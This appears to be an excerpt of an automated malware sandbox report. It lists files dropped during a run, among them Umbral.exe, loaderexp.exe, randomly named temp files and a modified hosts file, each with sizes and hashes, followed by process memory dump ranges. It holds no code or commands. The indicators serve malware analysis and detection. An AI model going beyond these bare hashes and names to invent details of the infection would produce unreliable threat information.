0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
97040f560821a95c4439d1335f23146e

SHA1
0fbff66fffa58e78b775a8bd325156dd5c8ef7d9

SHA256
d4704b8aefda362ca72b0a6a56b28b6838ae9e1ac0fefdd2add970253455366a

SHA512
99721741cd9ad00800fa375600c7fd3f59e58f1de4cd037971ce63d79ce12856200181bef08d01252b36852e2e2a55347ba0c2ad347319da7f79f1e473b9ea6f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
8a424e81b5a6078deff05e153c04a0ee

SHA1
bf209de0dbc1dbe7c5b5b511bd34bf447a3c049b

SHA256
79ce6d6caea4a9eabf8fdbb2a1c58d43fb5a3c500c2dec3fce87c160d2c6bda3

SHA512
aa01195e5c1d641304b08fed4a3bffc916972aa0bc20e928204cef1783f38922a03b761cf2010ccbace1ea0d2f18cda4eaeee4d8969f32fbae5f580e4e38522d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
719fd150e78f630817910e72ad00fc16

SHA1
093ef625bd5e314e334cffda49458cde7b8a85aa

SHA256
17850f8bbb06ed6af4ba88f2c085dd1f3afa20f36f63dc20ad548c1ce61a9455

SHA512
cd8b52ddf31313f77f905b2203e55ec32e65cf2f47c828d3262b9fe2ec3cc2704d112ba3574be8967b704cb0c1fbc986665b40ab85b1ad129e5bc98354c8e175

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
5824a6037c081fda5d46de274b6e2799

SHA1
526367a09300cbde430e8fb44e41cbe7a0937aac

SHA256
4d610d9cd32a20279c7133a726ff61820d6930e5aa18253ee1422f3a6f54953f

SHA512
a109b150f730cda78d5bee106bd232f9dca7500dfb7899c6919de2bd542e345ca271aa11809a24ea0a27dca158067ab3a2d5688ac0a2325185143245f1665582

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
107102102e02e48f37f5318c7e113c43

SHA1
7fb10fc65c85fb4c050309f0872bc9389dcccc0d

SHA256
3c3f49948c1e832c86b959c32bc288ddedb500534b74df082f8967fc7f9976f7

SHA512
b108a47d7c3dd154cad44362b6cd557b7064096383d100e6cd64bfb19c4e2ad878ed4ee800776322ad3cc4bb721fb675b0ecab8f5661024188fa3aa19561841b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d3e9c29fe44e90aae6ed30ccf799ca8

SHA1
c7974ef72264bbdf13a2793ccf1aed11bc565dce

SHA256
2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

SHA512
60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
c65738617888921a153bd9b1ef516ee7

SHA1
5245e71ea3c181d76320c857b639272ac9e079b1

SHA256
4640ba4001fd16a593315299cbdd4988dc2c7075820687f1018aac40aca95c26

SHA512
2e2a0ebd93f9d8dd07a7599054bce232683e9add9a35e77b584618040bcfd84a42545352519ec4736cc379002210b6f3ed2d905591c6925c0981b0392b495bfa

Download Submit
C:\Users\Admin\AppData\Local\Temp\B9R6gtDO5rErzYN\Display\Display.png

Filesize
425KB

MD5
8fec1024fbf085c487fc3894aec6fef1

SHA1
c221ab5a643c2802dc7015c1b5240e5fef28df7b

SHA256
c04e93468d6644fd010e054bc8187e62d653ecfcd65059858cb463e19cdfe7d6

SHA512
6f598092bfe63d5da49fb4552a5f95adbad5806f58538332034e96483498b1dc8e2d429e9b5b8af5efcba3de8591450d4030574a0e0ff2b45b21b58b44ad192c

Download Submit
C:\Users\Admin\AppData\Local\Temp\LI2UmRIOpN2j94G

Filesize
40KB

MD5
a182561a527f929489bf4b8f74f65cd7

SHA1
8cd6866594759711ea1836e86a5b7ca64ee8911f

SHA256
42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

SHA512
9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

Download Submit
C:\Users\Admin\AppData\Local\Temp\Umbral.exe

Filesize
229KB

MD5
35bfad8beb24021798e8410c299fb64a

SHA1
064970ecd6e29be2cb5da7cb73f718e326e1b785

SHA256
73ce24ee931d0a3fd27a395bad1b3b45a8c7a2f1841432868ee0e9a16ea56c4e

SHA512
d95d9ffbd89cbea4958eec3e4a4544d87112bff4a35acbc43a4705b4f5c1d2709831a75e6a7838be7359c8033bb3a08e89ad33b743b548c0b95b631666ad1584

Download Submit
C:\Users\Admin\AppData\Local\Temp\XOh6mXBwfosvTCy

Filesize
20KB

MD5
49693267e0adbcd119f9f5e02adf3a80

SHA1
3ba3d7f89b8ad195ca82c92737e960e1f2b349df

SHA256
d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f

SHA512
b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ht1d0kmi.eqm.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\hzDu0QSQoHpD9OT

Filesize
48KB

MD5
349e6eb110e34a08924d92f6b334801d

SHA1
bdfb289daff51890cc71697b6322aa4b35ec9169

SHA256
c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a

SHA512
2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

Download Submit
C:\Users\Admin\AppData\Local\Temp\loaderexp.exe

Filesize
407KB

MD5
1beb7aa96b112bf1cdea3f8ae277002a

SHA1
0a846c4794c62694c8765f0b8e58ea9e807e2a97

SHA256
a62b25c555f2e0943d0494fd88ee92b7fe64b17ee3f9ee294cd6f9f1362a63ed

SHA512
9667870c6994936d3e8fdd46b87feb701320552a707b9728ef53cdef995bd765729856f8f6af08800e4ea5db8905c9bf1bf5c9ed7fcf657500283f55fecaa056

Download Submit
C:\Users\Admin\AppData\Local\Temp\u5tW0WLyehfQTWA

Filesize
20KB

MD5
a603e09d617fea7517059b4924b1df93

SHA1
31d66e1496e0229c6a312f8be05da3f813b3fa9e

SHA256
ccd15f9c7a997ae2b5320ea856c7efc54b5055254d41a443d21a60c39c565cb7

SHA512
eadb844a84f8a660c578a2f8e65ebcb9e0b9ab67422be957f35492ff870825a4b363f96fd1c546eaacfd518f6812fcf57268ef03c149e5b1a7af145c7100e2cc

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
4028457913f9d08b06137643fe3e01bc

SHA1
a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14

SHA256
289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58

SHA512
c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b

Download Submit
memory/1420-114-0x000001A9D12E0000-0x000001A9D12F2000-memory.dmp

Filesize
72KB

Download
memory/1420-75-0x000001A9D1160000-0x000001A9D11D6000-memory.dmp

Filesize
472KB

Download
memory/1420-76-0x000001A9D10E0000-0x000001A9D1130000-memory.dmp

Filesize
320KB

Download
memory/1420-77-0x000001A9B8760000-0x000001A9B877E000-memory.dmp

Filesize
120KB

Download
memory/1420-30-0x000001A9B69D0000-0x000001A9B6A10000-memory.dmp

Filesize
256KB

Download
memory/1420-113-0x000001A9B8790000-0x000001A9B879A000-memory.dmp

Filesize
40KB

Download
memory/1708-48-0x00007FFCD1980000-0x00007FFCD2441000-memory.dmp

Filesize
10.8MB

Download
memory/1708-1650-0x00000277CCE20000-0x00000277CD03C000-memory.dmp

Filesize
2.1MB

Download
memory/1708-22-0x00007FFCD1980000-0x00007FFCD2441000-memory.dmp

Filesize
10.8MB

Download
memory/1884-1377-0x0000023E329D0000-0x0000023E32BEC000-memory.dmp

Filesize
2.1MB

Download
memory/3864-1043-0x0000019DD43E0000-0x0000019DD45FC000-memory.dmp

Filesize
2.1MB

Download
memory/4020-0-0x00007FFCD1983000-0x00007FFCD1985000-memory.dmp

Filesize
8KB

Download
memory/4020-2-0x00007FFCD1980000-0x00007FFCD2441000-memory.dmp

Filesize
10.8MB

Download
memory/4020-29-0x00007FFCD1980000-0x00007FFCD2441000-memory.dmp

Filesize
10.8MB

Download
memory/4020-1-0x00000000007E0000-0x000000000175C000-memory.dmp

Filesize
15.5MB

Download
memory/4104-54-0x0000027177560000-0x0000027177582000-memory.dmp

Filesize
136KB

Download
memory/4156-1204-0x000002807D0E0000-0x000002807D2FC000-memory.dmp

Filesize
2.1MB

Download
memory/4384-24-0x0000000000980000-0x00000000009EA000-memory.dmp

Filesize
424KB

Download
memory/4384-27-0x00007FFCD1980000-0x00007FFCD2441000-memory.dmp

Filesize
10.8MB

Download
memory/4384-32-0x00007FFCD1980000-0x00007FFCD2441000-memory.dmp

Filesize
10.8MB

Download